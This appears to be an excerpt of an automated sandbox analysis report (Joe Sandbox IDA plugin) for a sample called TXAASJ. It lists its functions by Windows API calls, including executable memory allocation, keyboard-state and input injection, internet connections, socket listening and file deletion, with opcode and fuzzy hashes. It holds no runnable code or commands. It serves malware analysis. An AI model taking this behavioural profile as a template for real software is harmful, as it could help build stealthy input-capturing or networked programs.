                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E53EBB,?,00E53E91,?), ref: 00E53ED3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E53EE5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00EA6AA6), ref: 00E5AB2D
                                                                                                                        • _wcscmp.LIBCMT ref: 00E5AB49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 820872866-0
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EB0D85
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EB0DC8
                                                                                                                          • Part of subcall function 00EB0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00EB0478
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EB0FB2
                                                                                                                        • _memmove.LIBCMT ref: 00EB0FC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3659485706-0
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00EAAF56
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAAF61
                                                                                                                          • Part of subcall function 00E91050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E910B8
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAAF6C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB23F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 780911581-0
                                                                                                                        • Opcode ID: 5ea93a32c5750a53b5b3a2a04a904ededf3573c26d44fad431de65d53d33f275
                                                                                                                        • Instruction ID: 40b475267884f2aefe64f993faaf4b8f9d8d490f37e4eeefe17080a208ddb2cb
                                                                                                                        • Opcode Fuzzy Hash: 5ea93a32c5750a53b5b3a2a04a904ededf3573c26d44fad431de65d53d33f275
                                                                                                                        • Instruction Fuzzy Hash: 01A135356047019FCB10DF14C991B6AB7E5BF89364F149859F99AAB3A2CB30FD44CB82
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3877424927-0
                                                                                                                        • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                        • Instruction ID: 0f0294d29ec63a8852f8821114715caf59ccb38f974866b6a72fd1ea5864367e
                                                                                                                        • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                        • Instruction Fuzzy Hash: C151C6B1A00305EBDB249FB988846AE77B5AF40324F24D729F87DB62D0E7709E519B40
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBC354
                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00EBC384
                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00EBC3EA
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3880355969-0
                                                                                                                        • Opcode ID: 2eafb8851e1bab77af403ee77a55e526d7f25637a6e99c0107b01abf8467c5ae
                                                                                                                        • Instruction ID: e455d587d5a54486d2c4bbaae2338fd7b492f7d49fffef8824481b81d4729b1c
                                                                                                                        • Opcode Fuzzy Hash: 2eafb8851e1bab77af403ee77a55e526d7f25637a6e99c0107b01abf8467c5ae
                                                                                                                        • Instruction Fuzzy Hash: 66515C71A04209AFCF10DF68C880AEE7BE6FF45364F209559E965AB291D770ED41CB90
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E8D258
                                                                                                                        • __itow.LIBCMT ref: 00E8D292
                                                                                                                          • Part of subcall function 00E8D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E8D549
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E8D2FB
                                                                                                                        • __itow.LIBCMT ref: 00E8D350
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3379773720-0
                                                                                                                        • Opcode ID: 994c3886865d95d077215a5131774acd1c006ebb0d4553e39919c08330c0aef8
                                                                                                                        • Instruction ID: 99ac66eb36d3a2414c14683f633e3baa7d66ff8d98d65df3543bc914f4ef3fbd
                                                                                                                        • Opcode Fuzzy Hash: 994c3886865d95d077215a5131774acd1c006ebb0d4553e39919c08330c0aef8
                                                                                                                        • Instruction Fuzzy Hash: B4418171A04609ABDF11EF54CC52BEE7BF9AF88701F005419FA09B32D1DB709A49CB62
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E9EF32
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00E9EF58
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E9EF7D
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E9EFA9
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: 3053c4a29fe3575ce86b8764b69143c419f27e04b3df941182e52eada51d6985
                                                                                                                        • Instruction ID: 6abf49eb3f9e3bd0b9b28ccd79b0baa01a2262bf2fa1ebbdd486776e55b25b3d
                                                                                                                        • Opcode Fuzzy Hash: 3053c4a29fe3575ce86b8764b69143c419f27e04b3df941182e52eada51d6985
                                                                                                                        • Instruction Fuzzy Hash: 834102396006119FCF10EF15CA45A59BBE6EF89320B199489ED5ABF362CB30FD44CB91
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EBB3E1
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: 224b94d6ed71a79323448e9331f8eefd15cccbac86fe76c2d4d6ff0799fa5510
                                                                                                                        • Instruction ID: 4c97af2d77141e5c6439f9f804c7d32d2ebf9a0049f2ebc4a14fdd9ea6141ab9
                                                                                                                        • Opcode Fuzzy Hash: 224b94d6ed71a79323448e9331f8eefd15cccbac86fe76c2d4d6ff0799fa5510
                                                                                                                        • Instruction Fuzzy Hash: 0B31D034600208EFEF249E59DC85FEE37A4FB05354F54A512FA62F61A2E7F0D840AB61
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBD617
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBD68D
                                                                                                                        • PtInRect.USER32(?,?,00EBEB2C), ref: 00EBD69D
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00EBD70E
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352109105-0
                                                                                                                        • Opcode ID: 9e60a3d7cceb837dee880f3cc2a5a034d213843dc2f49f7393ae9505e91a2c2d
                                                                                                                        • Instruction ID: b7b38deec93c04af1e193ee03df65c3bb235d467f5dfb75f0fcc2f1ef28e83e6
                                                                                                                        • Opcode Fuzzy Hash: 9e60a3d7cceb837dee880f3cc2a5a034d213843dc2f49f7393ae9505e91a2c2d
                                                                                                                        • Instruction Fuzzy Hash: 2441C934A08119DFCB11CF99EC80BEA7BF5FB49314F1891AAE509AB254E730E841DB80
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E944EE
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9450A
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00E9456A
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E945C8
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: b662bd46fa376e131995b73fd11c6e06b994080748442c356fe1515c60626471
                                                                                                                        • Instruction ID: 4c5c709b7447c979354ddf860e99ff6d94ff29d391d87143e11021c93c67fae0
                                                                                                                        • Opcode Fuzzy Hash: b662bd46fa376e131995b73fd11c6e06b994080748442c356fe1515c60626471
                                                                                                                        • Instruction Fuzzy Hash: 5731E9F19042589FEF348BA49C08FFE7BA59B49318F05515AF482721C1C7749A46D761
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E84DE8
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00E84E16
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E84E44
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E84E7A
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EB7AB6
                                                                                                                          • Part of subcall function 00E969C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E969E3
                                                                                                                          • Part of subcall function 00E969C9: GetCurrentThreadId.KERNEL32 ref: 00E969EA
                                                                                                                          • Part of subcall function 00E969C9: AttachThreadInput.USER32(00000000,?,00E98127), ref: 00E969F1
                                                                                                                        • GetCaretPos.USER32(?), ref: 00EB7AC7
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00EB7B00
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EB7B06
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBEFE2
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ECF3C3,?,?,?,?,?), ref: 00EBEFF7
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBF041
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ECF3C3,?,?,?), ref: 00EBF077
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2864067406-0
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EA49B7
                                                                                                                          • Part of subcall function 00EA4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EA4A60
                                                                                                                          • Part of subcall function 00EA4A41: InternetCloseHandle.WININET(00000000), ref: 00EA4AFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1463438336-0
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EB88A3
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB88BD
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB88CB
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EB88D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00EA906D
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00EA907F
                                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00EA908C
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA90A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 385091864-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E92CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?), ref: 00E92CB9
                                                                                                                          • Part of subcall function 00E92CAA: lstrcpyW.KERNEL32(00000000,?,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E92CDF
                                                                                                                          • Part of subcall function 00E92CAA: lstrcmpiW.KERNEL32(00000000,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?), ref: 00E92D10
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E91916
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E9193C
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E91970
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00E83D65
                                                                                                                          • Part of subcall function 00E745EC: __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E745EC: __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E745EC: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E51E87
                                                                                                                          • Part of subcall function 00E538E4: _memset.LIBCMT ref: 00E53965
                                                                                                                          • Part of subcall function 00E538E4: _wcscpy.LIBCMT ref: 00E539B5
                                                                                                                          • Part of subcall function 00E538E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E539C6
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00E51EDC
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E51EEB
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378193009-0
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E9715C
                                                                                                                        • _memset.LIBCMT ref: 00E9717D
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E971CF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E971D8
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157408455-0
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E913EE
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E91409
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E9141F
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00E91474
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3137044355-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F282
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F2A6
                                                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00EA92F0
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA92FB
                                                                                                                        • _memmove.LIBCMT ref: 00EA9328
                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00EA9333
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1504782959-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C285
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C297
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C2AD
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C2C8
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E97C6C
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00E97C9F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E97CB5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E97CBC
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3970641297-0
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E949EE
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A13
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A1D
                                                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A50
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: fa8e60314e5c6eb3f082410be9c8e7176591af8e1ac36c863219b6d04e1bee88
                                                                                                                        • Instruction ID: b1cf6e17b88a13a326aa29d448a7309add7e56d95e5372192bbb0deda60f82ce
                                                                                                                        • Opcode Fuzzy Hash: fa8e60314e5c6eb3f082410be9c8e7176591af8e1ac36c863219b6d04e1bee88
                                                                                                                        • Instruction Fuzzy Hash: 20117CB1D4552CEBCF04EFA5ED48AEEBB78FF09711F006046E941B2280DB709551CB99
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction ID: df5a24e953be41fcfe63433d87e00b928f49f05d638eebf068101c79b9bd4c07
                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction Fuzzy Hash: A8014B3300064EBBCF126E88DC41CEE7F62BB58354B589815FA1C69131DA36CAB1AB81
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7869D: __getptd_noexit.LIBCMT ref: 00E7869E
                                                                                                                        • __lock.LIBCMT ref: 00E7811F
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00E7813C
                                                                                                                        • _free.LIBCMT ref: 00E7814F
                                                                                                                        • InterlockedIncrement.KERNEL32(01142478), ref: 00E78167
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
